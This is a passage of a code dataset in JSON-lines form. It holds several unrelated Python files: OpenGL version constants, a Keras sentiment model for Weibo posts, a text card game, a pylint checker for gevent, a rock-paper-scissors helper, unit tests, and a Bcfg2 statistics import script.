mgl.TRIANGLE_STRIP: TRIANGLE_STRIP,\n mgl.TRIANGLE_FAN: TRIANGLE_FAN,\n mgl.LINES: LINES,\n mgl.LINE_STRIP: LINE_STRIP,\n mgl.LINE_LOOP: LINE_LOOP,\n mgl.POINTS: POINTS,\n mgl.LINE_STRIP_ADJACENCY: LINE_STRIP_ADJACENCY,\n mgl.LINES_ADJACENCY: LINES_ADJACENCY,\n mgl.TRIANGLE_STRIP_ADJACENCY: TRIANGLE_STRIP_ADJACENCY,\n mgl.TRIANGLES_ADJACENCY: TRIANGLES_ADJACENCY,\n None: None,\n}\n'''\n PRIMITIVES\n'''\n\n\nclass Version:\n '''\n Version\n '''\n\n def __init__(self, major, minor):\n self._major = major\n self._minor = minor\n\n @property\n def major(self) -> int:\n '''\n major\n '''\n\n return self._major\n\n @property\n def minor(self) -> int:\n '''\n minor\n '''\n\n return self._minor\n\n\nCORE_330 = Version(3, 3)\n'''\n OpenGL 3.3\n'''\n\nCORE_400 = Version(4, 0)\n'''\n OpenGL 4.0\n'''\n\nCORE_410 = Version(4, 1)\n'''\n OpenGL 4.1\n'''\n\nCORE_420 = Version(4, 2)\n'''\n OpenGL 4.2\n'''\n\nCORE_430 = Version(4, 3)\n'''\n OpenGL 4.3\n'''\n\nCORE_440 = Version(4, 4)\n'''\n OpenGL 4.4\n'''\n\nCORE_450 = Version(4, 5)\n'''\n OpenGL 4.5\n'''\n","sub_path":"ModernGL/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"616346079","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 26 10:18:44 2016\nWeibo sentiment analysis model\n@author: yangxinwei\n\"\"\"\nfrom __future__ import print_function\nfrom pandas import Series\nfrom jieba import cut\nimport os\n#import matplotlib.pyplot as plt\n#from matplotlib import style\n#import time\nimport numpy as np\nimport re\nimport json\nimport codecs\nfrom keras.preprocessing.sequence import pad_sequences\n#from keras.utils.np_utils import to_categorical\nfrom keras.layers import Dense, Input, Flatten, Conv1D, MaxPooling1D, Embedding\nfrom keras.models import Model\n\n\n# create model's dir\nbasedir = os.path.abspath(os.path.dirname(__file__))\nworkdir = os.path.join(basedir, 'model')\nif not os.path.exists(workdir):\n os.mkdir(workdir)\n \ncorpusdir = os.path.join(workdir,'weibo_corpus.json')\n \n# 1. Tokenize and drop stop words\ndef cut_and_filter(s):\n if isinstance(s, (unicode, str)):\n if type(s) == str:\n s = s.decode('utf-8')\n ws = []\n s = re.sub(\"(\\d+)|(\\s+)\", \"\", s)# strip digits and whitespace\n for w in 
cut(s):\n if len(w) > 1:\n ws.append(w)\n return ws\n else:\n raise Exception('input type must be unicode')\n \n# 2. Build the Weibo corpus\ndef create_corpus(docs, max_words = 10000):\n words = []\n for i in docs:\n words.extend(i)\n wordcount = Series(words).value_counts()\n wordcount = wordcount[:max_words]\n wordcount[:] = xrange(1, max_words + 1)\n wordcount.to_json(corpusdir, force_ascii=False)\n #wordcount.to_csv(corpusdir, header=None, encoding='utf-8')\n print(u'Corpus built successfully')\n return wordcount\n \n# 3. Load the corpus\ndef load_corpus(fpath=corpusdir):\n with codecs.open(fpath, 'r', encoding='utf-8') as f:\n corpus = json.loads(f.read())\n #corpus = pd.read_csv(fpath, index_col=0, header=None, encoding='utf-8')\n #print(corpus)\n #corpus = corpus.to_dict()\n return corpus\n \ncorpus = load_corpus()\n\n# 4. Vectorize a document\ndef doc2vec(doc):\n vec = []\n for w in doc:\n if w in corpus:\n vec.append(corpus[w])\n return vec\n\n# 5. CNN-based model\nclass WeiboModel(object):\n def __init__(self):\n self.model = None\n self.history = None\n self.MAX_SEQUENCE_LENGTH = 100\n self.VALIDATION_SPLIT = 0.15\n\n self.EMBEDDING_DIM = 100\n self.BATCH_SIZE = 32\n self.NB_EPOCH = 2\n\n def pad_data(self, x):\n x = pad_sequences(x, maxlen = self.MAX_SEQUENCE_LENGTH)\n return x\n\n def split_data(self, x, y):\n indices = np.arange(x.shape[0])\n np.random.shuffle(indices)\n x = x[indices]\n y = y[indices]\n nb_validation_samples = int(self.VALIDATION_SPLIT * x.shape[0])\n x_train = x[:-nb_validation_samples]\n y_train = y[:-nb_validation_samples]\n x_val = x[-nb_validation_samples:]\n y_val = y[-nb_validation_samples:]\n return (x_train, y_train, x_val, y_val)\n\n def train(self, x_train, y_train, x_val, y_val): \n print('Training model........................')\n embedding_layer = Embedding(input_dim = len(corpus) + 1,\n output_dim = self.EMBEDDING_DIM,\n input_length = self.MAX_SEQUENCE_LENGTH)\n\n # train a 1D convnet with global maxpooling\n sequence_input = Input(shape=(self.MAX_SEQUENCE_LENGTH,), dtype='int32')\n embedded_sequences = embedding_layer(sequence_input)\n x = Conv1D(nb_filter=128, filter_length=3, activation='relu')(embedded_sequences)\n x = MaxPooling1D(pool_length=2)(x)\n #x = Conv1D(128, 5, activation='relu')(x)\n #x = MaxPooling1D(5)(x)\n #x = Conv1D(128, 5, activation='relu')(x)\n #x = MaxPooling1D(35)(x) # global max pooling\n x = Flatten()(x)\n x = Dense(128, activation='relu')(x)\n preds = Dense(1, activation='sigmoid')(x)\n\n self.model = Model(sequence_input, preds)\n self.model.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n self.history = self.model.fit(x_train, y_train, validation_data=(x_val, y_val),\n nb_epoch=self.NB_EPOCH, batch_size=self.BATCH_SIZE, verbose=2)\n return self.model\n\n def predict(self, x):\n y_pre = self.model.predict(x, batch_size=self.BATCH_SIZE, verbose=1)\n return y_pre\n\n def evaluate(self, x, y):\n precision = self.model.evaluate(x, y, batch_size=self.BATCH_SIZE, verbose=1)\n return precision\n\n def save_model(self):\n json_string = self.model.to_json()\n open(os.path.join(workdir, 'weibo_model_architecture.json'), 'w').write(json_string)\n self.model.save_weights(os.path.join(workdir, 'weibo_model_weights.h5'))\n print(u'Model saved successfully')\n return self.model\n\n def load_model(self):\n from keras.models import model_from_json\n self.model = model_from_json(open(os.path.join(workdir, 'weibo_model_architecture.json')).read())\n self.model.load_weights(os.path.join(workdir, 'weibo_model_weights.h5'))\n #print(u'Model loaded successfully')\n return 
self.model\n\n\n","sub_path":"Weibo_Model.py","file_name":"Weibo_Model.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445253846","text":"# Import function randint from module random\nfrom random import randint\n\n# Level 1 - one player.\n# Level 2 - one player + one bot.\n# Level 3 - one player + two bots.\n\n# Rules\ndeck = 10\nvictory_rule = 21 # max score; a player who goes above this busts\ncard_min = 2\ncard_max = 11\n\n# Bots strength\nbot_rule_1 = 19 # example: this bot stops drawing once its pick reaches this fixed score\nbot_rule_2 = 50 # example: dynamic bot threshold in percent; at 50 it never takes a card when the probability of success is 50% or less (not 0!)\n\nlevel = int(input(\"Game with 1 bot: input 1, game with 2 bots: input 2, solo game: input 0 or any other symbol \"))\n\ndecision_0 = 1 # user decision, 1 means the user keeps playing\ndecision_1 = 0\ndecision_2 = 0\n\nbot_pick_0 = 0 # user pick\nbot_pick_1 = 0\nbot_pick_2 = 0\n\nif level !=1 and level != 2:\n level = 0\nelif level == 1:\n decision_1 = 1\nelif level == 2:\n decision_1 = 1\n decision_2 = 1\n\nwhile (decision_0 or decision_1 or decision_2) and deck:\n\n # user\n # user step\n if decision_0:\n print(\"Your pick is\", bot_pick_0, \"and remaining deck is\", deck)\n decision_0 = int(input('Input \"1\" to take more or input \"0\" to pass '))\n if decision_0:\n deck -= 1\n bot_pick_0 += randint(card_min, card_max)\n\n # user check\n if bot_pick_0 > victory_rule:\n bot_pick_0 = -1\n decision_0 = 0 \n\n # bot 1\n # bot 1 step\n if level > 0 and deck and decision_1:\n if bot_pick_1 >= bot_rule_1:\n decision_1 = 0\n if decision_1:\n deck -= 1\n bot_pick_1 += randint(card_min, card_max)\n\n # bot 1 check\n if bot_pick_1 > victory_rule:\n bot_pick_1 = -1\n decision_1 = 0 \n\n # bot 2\n # bot 2 step\n if level > 1 and deck and decision_2:\n if card_min > (victory_rule - bot_pick_2):\n decision_2 = 0\n elif card_max > (victory_rule - bot_pick_2) and (card_max + card_min) > (100 / bot_rule_2) * (victory_rule - bot_pick_2):\n decision_2 = 0\n \n if decision_2:\n deck -= 1\n bot_pick_2 += randint(card_min, card_max)\n\n # bot 2 check\n if bot_pick_2 > victory_rule:\n bot_pick_2 = -1\n decision_2 = 0\n\nmax_pick = bot_pick_0\n\nif level > 0 and max_pick < bot_pick_1:\n max_pick = bot_pick_1 \n\nif level > 1 and max_pick < bot_pick_2:\n max_pick = bot_pick_2\n\nprint(\"remaining deck\", deck)\n\nif max_pick < 0:\n print(\"all players busted\")\nelse: \n if bot_pick_0 == max_pick:\n print(\"user is winner with score\", max_pick)\n elif bot_pick_0 > 0:\n print(\"user is loser with score\", bot_pick_0)\n else:\n print(\"user busted (went over the limit)\")\n\n if level > 0:\n if bot_pick_1 == max_pick:\n print(\"bot 1 is winner with score\", max_pick)\n elif bot_pick_1 > 0:\n print(\"bot 1 is loser with score\", bot_pick_1)\n else:\n print(\"bot 1 busted (went over the limit)\")\n \n if level > 1:\n if bot_pick_2 == max_pick:\n print(\"bot 2 is winner with score\", max_pick)\n elif bot_pick_2 > 0:\n print(\"bot 2 is loser with score\", bot_pick_2)\n else:\n print(\"bot 2 busted (went over the limit)\")\n\n\n\n \n","sub_path":"kirill_kravchenko/01/home_01.py","file_name":"home_01.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"23876213","text":"from astroid.exceptions import InferenceError\nfrom pylint.checkers import BaseChecker\nfrom 
pylint.interfaces import IAstroidChecker\n\nJOINALL_ID = \"gevent-joinall\"\nJOINALL_MSG = (\n \"First argument of joinall must have type set to avoid deadlocks. NOTE: set \"\n \"comprehensions are false positives, use `set()` instead.\"\n)\nJOINALL_RAISE_ERROR_ID = \"gevent-joinall-raise-error\"\nJOINALL_RAISE_ERROR_MSG = (\n \"`joinall` should always re-raise exceptions from the underlying greenlets, \"\n \"otherwise errors can be lost and the program will continue in an \"\n \"undetermined state.\"\n)\nGROUP_DISABLE_WAIT_ID = \"gevent-disable-wait\"\nGROUP_DISABLE_WAIT_MSG = (\n \"Just calling `gevent.wait` hides errors, since exceptions that killed the \"\n \"underlying greenlet are swallowed. Instead \"\n \"`gevent.joinall(raise_error=True)` should be used\"\n)\nGROUP_JOIN_ID = \"gevent-group-join\"\nGROUP_JOIN_MSG = (\n \"When calling `Group.join` or `Pool.join` the flag `raise_error` must be set to \"\n \"`True`, otherwise exceptions will go unnoticed.\"\n)\n\n\ndef is_gevent_joinall(inferred_func):\n return (\n inferred_func.name == \"joinall\"\n and inferred_func.callable()\n and inferred_func.root().name.startswith(\"gevent\")\n )\n\n\ndef is_gevent_wait(inferred_func):\n \"\"\"Note that `wait` is an alias to wait_on_objects set in the __init__.py,\n the inferred_func will have the original name instead of the alias name.\n \"\"\"\n return (\n inferred_func.name == \"wait_on_objects\"\n and inferred_func.callable()\n and inferred_func.root().name.startswith(\"gevent\")\n )\n\n\ndef is_group_join(inferred_func):\n # This intentionally does not check the class, as of gevent 1.5a3 it matches\n # Group and Pool, which are the classes that need to be checked.\n return (\n inferred_func.name == \"join\"\n and inferred_func.callable()\n and inferred_func.root().name == \"gevent.pool\"\n )\n\n\ndef is_of_type(inferred_value, type_):\n return inferred_value is type_\n\n\ndef register(linter):\n linter.register_checker(GeventChecker(linter))\n\n\nclass GeventChecker(BaseChecker):\n __implements__ = IAstroidChecker\n\n name = \"gevent\"\n priority = -1\n msgs = {\n \"E6491\": (JOINALL_MSG, JOINALL_ID, \"Waiting with joinall on a non-set is an error.\"),\n \"E6493\": (\n GROUP_JOIN_MSG,\n GROUP_JOIN_ID,\n \"Waiting with Group.join without raise_error set to True.\",\n ),\n \"E6495\": (\n GROUP_DISABLE_WAIT_MSG,\n GROUP_DISABLE_WAIT_ID,\n \"gevent.wait should not be used, use gevent.joinall(raise_error=True) instead.\",\n ),\n \"E6496\": (\n JOINALL_RAISE_ERROR_MSG,\n JOINALL_RAISE_ERROR_ID,\n \"`gevent.joinall` always needs `raise_error=True` set.\",\n ),\n }\n\n def visit_call(self, node):\n \"\"\"Called on expressions of the form `expr()`, where `expr` is a simple\n name e.g. `f()` or a path e.g. 
`v.f()`.\n \"\"\"\n try:\n self._force_joinall_to_use_set(node)\n except InferenceError:\n pass\n\n try:\n self._force_joinall_to_set_raise_error(node)\n except InferenceError:\n pass\n\n try:\n self._force_joinall_instead_of_wait(node)\n except InferenceError:\n pass\n\n try:\n self._force_group_join_to_set_raise_error(node)\n except InferenceError:\n pass\n\n def _force_joinall_to_use_set(self, node):\n \"\"\"This detects usages of the form:\n\n >>> from gevent import joinall\n >>> joinall(...)\n\n or:\n\n >>> import gevent\n >>> gevent.joinall(...)\n \"\"\"\n for inferred_func in node.func.infer():\n if is_gevent_joinall(inferred_func):\n\n try:\n is_every_value_a_set = all(\n inferred_first_arg.pytype() == \"builtins.set\"\n for inferred_first_arg in node.args[0].infer()\n )\n except InferenceError:\n is_every_value_a_set = False\n\n if not is_every_value_a_set:\n self.add_message(JOINALL_ID, node=node)\n\n def _force_joinall_to_set_raise_error(self, node):\n \"\"\"This detects usages of the form:\n\n >>> from gevent import joinall\n >>> joinall(..., raise_error=True)\n\n or:\n\n >>> import gevent\n >>> gevent.joinall(..., raise_error=True)\n \"\"\"\n for inferred_func in node.func.infer():\n if is_gevent_joinall(inferred_func):\n is_raise_error_true = False\n\n # This check won't work with positional arguments, which should\n # be fine, since `pool.join(None, True)` is not very readable.\n if node.keywords is not None:\n is_raise_error_true = any(\n keyword.arg == \"raise_error\" and keyword.value.value is True\n for keyword in node.keywords\n )\n\n if not is_raise_error_true:\n self.add_message(JOINALL_RAISE_ERROR_ID, node=node)\n\n def _force_joinall_instead_of_wait(self, node):\n \"\"\"This detects usages of the form:\n\n >>> from gevent import wait\n >>> wait(...)\n\n or:\n\n >>> import gevent\n >>> gevent.wait(...)\n \"\"\"\n for inferred_func in node.func.infer():\n if is_gevent_wait(inferred_func):\n self.add_message(GROUP_DISABLE_WAIT_ID, node=node)\n\n def _force_group_join_to_set_raise_error(self, node):\n \"\"\"This detects usages of the form:\n\n >>> from gevent.pool import Group, Pool\n >>> g = Group()\n >>> g.join(...)\n >>> p = Pool()\n >>> p.join(...)\n \"\"\"\n for inferred_func in node.func.infer():\n if is_group_join(inferred_func):\n is_raise_error_true = False\n\n # This check won't work with positional arguments, which should\n # be fine, since `pool.join(None, True)` is not very readable.\n if node.keywords is not None:\n is_raise_error_true = any(\n keyword.arg == \"raise_error\" and keyword.value.value is True\n for keyword in node.keywords\n )\n\n if not is_raise_error_true:\n self.add_message(GROUP_JOIN_ID, node=node)\n","sub_path":"tools/pylint/gevent_checker.py","file_name":"gevent_checker.py","file_ext":"py","file_size_in_byte":6632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"161034192","text":"import cfg\nfrom random import randint\n\n# Pick the BOT's move\ndef bot():\n lista_bot = ['PAPEL', 'PEDRA', 'TESOURA']\n jogada_bot = lista_bot[randint(0,2)]\n return jogada_bot\n\n# Compare the player's move with the bot's \n# and decide how many points to add or subtract \ndef batalha(jogador, bot):\n if (jogador == bot):\n pontos = cfg.pontosEmpatar\n elif (jogador == \"PAPEL\" and bot == \"PEDRA\"):\n pontos = cfg.pontosGanhar\n elif (jogador == \"PEDRA\" and bot == \"TESOURA\"):\n pontos = cfg.pontosGanhar\n elif (jogador == \"TESOURA\" and bot == 
\"PAPEL\"):\n pontos = cfg.pontosGanhar\n else:\n pontos = cfg.pontosPerder\n pass\n return pontos\n\n# Atualiza o Placar no arquivo TXT\ndef atualizarPlacar(dados):\n lista = []\n final = \"\"\n\n for line in open('rank.txt'):\n lista.append(line)\n\n dados = \"\\n\" + str(dados)\n lista.append(dados)\n \n for i in lista:\n final = final + i\n\n print(final)\n\n placar = open(\"rank.txt\", \"+w\")\n placar.write(final)","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"94569173","text":"\"\"\"\n\nCreated by: Nathan Starkweather\nCreated on: 02/24/2014\nCreated in: PyCharm Community Edition\n\n\n\"\"\"\nfrom shutil import rmtree\n\n__author__ = 'Nathan Starkweather'\n\nimport unittest\nimport scripts.tpid.tpidmany as tpidmany\nimport scripts.test.test_tpid.test_setup as tpid_setup\nfrom os import makedirs\nfrom os.path import dirname, join\n\ncurdir = dirname(__file__)\ntest_dir = dirname(curdir)\ndata_dir = join(curdir, \"data\")\ntemp_dir = join(test_dir, \"temp\", \"tpid_temp\")\n\n\ndef copy_list1(to_copy):\n list_iter = iter(to_copy)\n next(list_iter)\n return [line.copy() for line in list_iter]\n\n\n# noinspection PyProtectedMember\nclass TestStepTests(tpid_setup.TPIDUnittest):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n @return:\n @rtype:\n \"\"\"\n super().setUpClass()\n try:\n makedirs(temp_dir)\n except FileExistsError:\n pass\n\n cls.steps_report1 = join(data_dir, \"full_scan_steps_input.csv\")\n cls.data_report1 = join(data_dir, \"full_scan_data_input.csv\")\n\n def test_extract_raw_steps(self):\n \"\"\"\n @return:\n @rtype:\n \"\"\"\n\n extract_raw_steps = tpidmany.extract_raw_steps\n\n expected_extracted_steps = tpid_setup.steps_report1_expected_lines[1:]\n\n result = extract_raw_steps(self.steps_report1)\n for exp_line, res_line in zip(expected_extracted_steps, result):\n self.assertEqual(exp_line, res_line)\n\n def test_extract_test_steps(self):\n \"\"\"\n @return:\n @rtype:\n \"\"\"\n\n extract_test_steps = tpidmany.extract_test_steps\n\n steps = copy_list1(tpid_setup.steps_report1_expected_lines)\n expected_extracted_tests = tpid_setup.steps_report1_expected_test_steps\n result = extract_test_steps(steps)\n\n for exp_line, result_line in zip(expected_extracted_tests, result):\n self.assertEqual(exp_line, result_line)\n\n def test_parse_test_dates(self):\n \"\"\"\n test parse_test_dates function\n @return:\n @rtype:\n \"\"\"\n\n parse_test_dates = tpidmany.parse_test_dates\n expected = tpid_setup.steps_report1_datetimes\n input_tests = tpid_setup.steps_report1_expected_test_steps\n\n assertEqual = self.assertEqual\n result = parse_test_dates(input_tests)\n\n # Slower on failures, but just as fast on passes.\n # Would rather fail slowly with an easy to understand\n # error message.\n try:\n assertEqual(expected, result)\n except self.failureException:\n for in_line, exp_line, res_line in zip(input_tests, expected, result):\n try:\n assertEqual(exp_line, res_line)\n except self.failureException:\n for in_str, exp_dt, res_dt in zip(in_line, exp_line, res_line):\n assertEqual(exp_dt, res_dt, msg=\"Invalid result from input str '%s'\" % in_str)\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"\n @return:\n @rtype:\n \"\"\"\n try:\n rmtree(temp_dir)\n except FileNotFoundError:\n pass\n\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"archive/test/test_tpid/test_tpid_many_steps.py","file_name":"test_tpid_many_steps.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"409338134","text":"#! /usr/bin/env python\n\"\"\"\nImports statistics.xml and clients.xml files in to database backend for\nnew statistics engine\n\"\"\"\n\nimport os\nimport sys\nimport traceback\ntry:\n import Bcfg2.settings\nexcept Exception:\n e = sys.exc_info()[1]\n sys.stderr.write(\"Failed to load configuration settings. %s\\n\" % e)\n sys.exit(1)\n\nproject_directory = os.path.dirname(Bcfg2.settings.__file__)\nproject_name = os.path.basename(project_directory)\nsys.path.append(os.path.join(project_directory, '..'))\nproject_module = __import__(project_name, '', '', [''])\nsys.path.pop()\n# Set DJANGO_SETTINGS_MODULE appropriately.\nos.environ['DJANGO_SETTINGS_MODULE'] = '%s.settings' % project_name\n\nfrom Bcfg2.Server.Reports.reports.models import *\nfrom lxml.etree import XML, XMLSyntaxError\nfrom getopt import getopt, GetoptError\nfrom datetime import datetime\nfrom time import strptime\nfrom django.db import connection, transaction\nfrom Bcfg2.Server.Plugins.Metadata import ClientMetadata\nimport logging\nimport Bcfg2.Logger\nimport platform\n\n# Compatibility import\nfrom Bcfg2.Compat import ConfigParser, b64decode\n\n\ndef build_reason_kwargs(r_ent, encoding, logger):\n binary_file = False\n sensitive_file = False\n unpruned_entries = ''\n if r_ent.get('sensitive') in ['true', 'True']:\n sensitive_file = True\n rc_diff = ''\n elif r_ent.get('current_bfile', False):\n binary_file = True\n rc_diff = r_ent.get('current_bfile')\n if len(rc_diff) > 1024 * 1024:\n rc_diff = ''\n elif len(rc_diff) == 0:\n # No point in flagging binary if we have no data\n binary_file = False\n elif r_ent.get('current_bdiff', False):\n rc_diff = b64decode(r_ent.get('current_bdiff'))\n elif r_ent.get('current_diff', False):\n rc_diff = r_ent.get('current_diff')\n else:\n rc_diff = ''\n # detect unmanaged entries in pruned directories\n if r_ent.get('prune', 'false') == 'true' and r_ent.get('qtest'):\n unpruned_elist = [e.get('path') for e in r_ent.findall('Prune')]\n unpruned_entries = \"\\n\".join(unpruned_elist)\n if not binary_file:\n try:\n rc_diff = rc_diff.decode(encoding)\n except:\n logger.error(\"Reason isn't %s encoded, cannot decode it\" % encoding)\n rc_diff = ''\n return dict(owner=r_ent.get('owner', default=\"\"),\n current_owner=r_ent.get('current_owner', default=\"\"),\n group=r_ent.get('group', default=\"\"),\n current_group=r_ent.get('current_group', default=\"\"),\n perms=r_ent.get('perms', default=\"\"),\n current_perms=r_ent.get('current_perms', default=\"\"),\n status=r_ent.get('status', default=\"\"),\n current_status=r_ent.get('current_status', default=\"\"),\n to=r_ent.get('to', default=\"\"),\n current_to=r_ent.get('current_to', default=\"\"),\n version=r_ent.get('version', default=\"\"),\n current_version=r_ent.get('current_version', default=\"\"),\n current_exists=r_ent.get('current_exists', default=\"True\").capitalize() == \"True\",\n current_diff=rc_diff,\n is_binary=binary_file,\n is_sensitive=sensitive_file,\n unpruned=unpruned_entries)\n\ndef _fetch_reason(elem, kargs, logger):\n try:\n rr = None\n try:\n rr = Reason.objects.filter(**kargs)[0]\n except IndexError:\n rr = Reason(**kargs)\n rr.save()\n logger.debug(\"Created reason: %s\" % rr.id)\n except Exception:\n ex = sys.exc_info()[1]\n 
logger.error(\"Failed to create reason for %s: %s\" % (elem.get('name'), ex))\n rr = Reason(current_exists=elem.get('current_exists',\n default=\"True\").capitalize() == \"True\")\n rr.save()\n return rr\n\n\ndef load_stats(sdata, encoding, vlevel, logger, quick=False, location=''):\n for node in sdata.findall('Node'):\n name = node.get('name')\n for statistics in node.findall('Statistics'):\n try:\n load_stat(name, statistics, encoding, vlevel, logger, quick, location)\n except:\n logger.error(\"Failed to create interaction for %s: %s\" %\n (name, traceback.format_exc().splitlines()[-1]))\n\n@transaction.commit_on_success\ndef load_stat(cobj, statistics, encoding, vlevel, logger, quick, location):\n if isinstance(cobj, ClientMetadata):\n client_name = cobj.hostname\n else:\n client_name = cobj\n client, created = Client.objects.get_or_create(name=client_name)\n if created and vlevel > 0:\n logger.info(\"Client %s added to db\" % client_name)\n\n timestamp = datetime(*strptime(statistics.get('time'))[0:6])\n ilist = Interaction.objects.filter(client=client,\n timestamp=timestamp)\n if ilist:\n current_interaction = ilist[0]\n if vlevel > 0:\n logger.info(\"Interaction for %s at %s with id %s already exists\" % \\\n (client.id, timestamp, current_interaction.id))\n return\n else:\n newint = Interaction(client=client,\n timestamp=timestamp,\n state=statistics.get('state',\n default=\"unknown\"),\n repo_rev_code=statistics.get('revision',\n default=\"unknown\"),\n goodcount=statistics.get('good',\n default=\"0\"),\n totalcount=statistics.get('total',\n default=\"0\"),\n server=location)\n newint.save()\n current_interaction = newint\n if vlevel > 0:\n logger.info(\"Interaction for %s at %s with id %s INSERTED in to db\" % (client.id,\n timestamp, current_interaction.id))\n\n if isinstance(cobj, ClientMetadata):\n try:\n imeta = InteractionMetadata(interaction=current_interaction)\n profile, created = Group.objects.get_or_create(name=cobj.profile)\n imeta.profile = profile\n imeta.save() # save here for m2m\n\n #FIXME - this should be more efficient\n group_set = []\n for group_name in cobj.groups:\n group, created = Group.objects.get_or_create(name=group_name)\n if created:\n logger.debug(\"Added group %s\" % group)\n imeta.groups.add(group)\n for bundle_name in cobj.bundles:\n bundle, created = Bundle.objects.get_or_create(name=bundle_name)\n if created:\n logger.debug(\"Added bundle %s\" % bundle)\n imeta.bundles.add(bundle)\n imeta.save()\n except:\n logger.error(\"Failed to save interaction metadata for %s: %s\" %\n (client_name, traceback.format_exc().splitlines()[-1]))\n\n\n entries_cache = {}\n [entries_cache.__setitem__((e.kind, e.name), e) \\\n for e in Entries.objects.all()]\n counter_fields = {TYPE_BAD: 0,\n TYPE_MODIFIED: 0,\n TYPE_EXTRA: 0}\n pattern = [('Bad/*', TYPE_BAD),\n ('Extra/*', TYPE_EXTRA),\n ('Modified/*', TYPE_MODIFIED)]\n for (xpath, type) in pattern:\n for x in statistics.findall(xpath):\n counter_fields[type] = counter_fields[type] + 1\n rr = _fetch_reason(x, build_reason_kwargs(x, encoding, logger), logger)\n\n try:\n entry = entries_cache[(x.tag, x.get('name'))]\n except KeyError:\n entry, created = Entries.objects.get_or_create(\\\n name=x.get('name'), kind=x.tag)\n\n Entries_interactions(entry=entry, reason=rr,\n interaction=current_interaction,\n type=type).save()\n if vlevel > 0:\n logger.info(\"%s interaction created with reason id %s and entry %s\" % (xpath, rr.id, entry.id))\n\n # add good entries\n good_reason = None\n for x in 
statistics.findall('Good/*'):\n if good_reason == None:\n # Do this once. Really need to fix Reasons...\n good_reason = _fetch_reason(x, build_reason_kwargs(x, encoding, logger), logger)\n try:\n entry = entries_cache[(x.tag, x.get('name'))]\n except KeyError:\n entry, created = Entries.objects.get_or_create(\\\n name=x.get('name'), kind=x.tag)\n Entries_interactions(entry=entry, reason=good_reason,\n interaction=current_interaction,\n type=TYPE_GOOD).save()\n if vlevel > 0:\n logger.info(\"%s interaction created with reason id %s and entry %s\" % (xpath, good_reason.id, entry.id))\n\n # Update interaction counters\n current_interaction.bad_entries = counter_fields[TYPE_BAD]\n current_interaction.modified_entries = counter_fields[TYPE_MODIFIED]\n current_interaction.extra_entries = counter_fields[TYPE_EXTRA]\n current_interaction.save()\n\n mperfs = []\n for times in statistics.findall('OpStamps'):\n for metric, value in list(times.items()):\n mmatch = []\n if not quick:\n mmatch = Performance.objects.filter(metric=metric, value=value)\n\n if mmatch:\n mperf = mmatch[0]\n else:\n mperf = Performance(metric=metric, value=value)\n mperf.save()\n mperfs.append(mperf)\n current_interaction.performance_items.add(*mperfs)\n\n\nif __name__ == '__main__':\n from sys import argv\n verb = 0\n cpath = \"/etc/bcfg2.conf\"\n clientpath = False\n statpath = False\n syslog = False\n\n try:\n opts, args = getopt(argv[1:], \"hvudc:s:CS\", [\"help\",\n \"verbose\",\n \"updates\",\n \"debug\",\n \"clients=\",\n \"stats=\",\n \"config=\",\n \"syslog\"])\n except GetoptError:\n mesg = sys.exc_info()[1]\n # print help information and exit:\n print(\"%s\\nUsage:\\nimportscript.py [-h] [-v] [-u] [-d] [-S] [-C bcfg2 config file] [-s statistics-file]\" % (mesg))\n raise SystemExit(2)\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n print(\"Usage:\\nimportscript.py [-h] [-v] -s \\n\")\n print(\"h : help; this message\")\n print(\"v : verbose; print messages on record insertion/skip\")\n print(\"u : updates; print status messages as items inserted semi-verbose\")\n print(\"d : debug; print most SQL used to manipulate database\")\n print(\"C : path to bcfg2.conf config file.\")\n print(\"s : statistics.xml file\")\n print(\"S : syslog; output to syslog\")\n raise SystemExit\n if o in [\"-C\", \"--config\"]:\n cpath = a\n\n if o in (\"-v\", \"--verbose\"):\n verb = 1\n if o in (\"-u\", \"--updates\"):\n verb = 2\n if o in (\"-d\", \"--debug\"):\n verb = 3\n if o in (\"-c\", \"--clients\"):\n print(\"DeprecationWarning: %s is no longer used\" % o)\n\n if o in (\"-s\", \"--stats\"):\n statpath = a\n if o in (\"-S\", \"--syslog\"):\n syslog = True\n\n logger = logging.getLogger('importscript.py')\n logging.getLogger().setLevel(logging.INFO)\n Bcfg2.Logger.setup_logging('importscript.py',\n True,\n syslog, level=logging.INFO)\n\n cf = ConfigParser.ConfigParser()\n cf.read([cpath])\n\n if not statpath:\n try:\n statpath = \"%s/etc/statistics.xml\" % cf.get('server', 'repository')\n except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):\n print(\"Could not read bcfg2.conf; exiting\")\n raise SystemExit(1)\n try:\n statsdata = XML(open(statpath).read())\n except (IOError, XMLSyntaxError):\n print(\"StatReports: Failed to parse %s\" % (statpath))\n raise SystemExit(1)\n\n try:\n encoding = cf.get('components', 'encoding')\n except:\n encoding = 'UTF-8'\n\n q = '-O3' in sys.argv\n\n # don't load this at the top. 
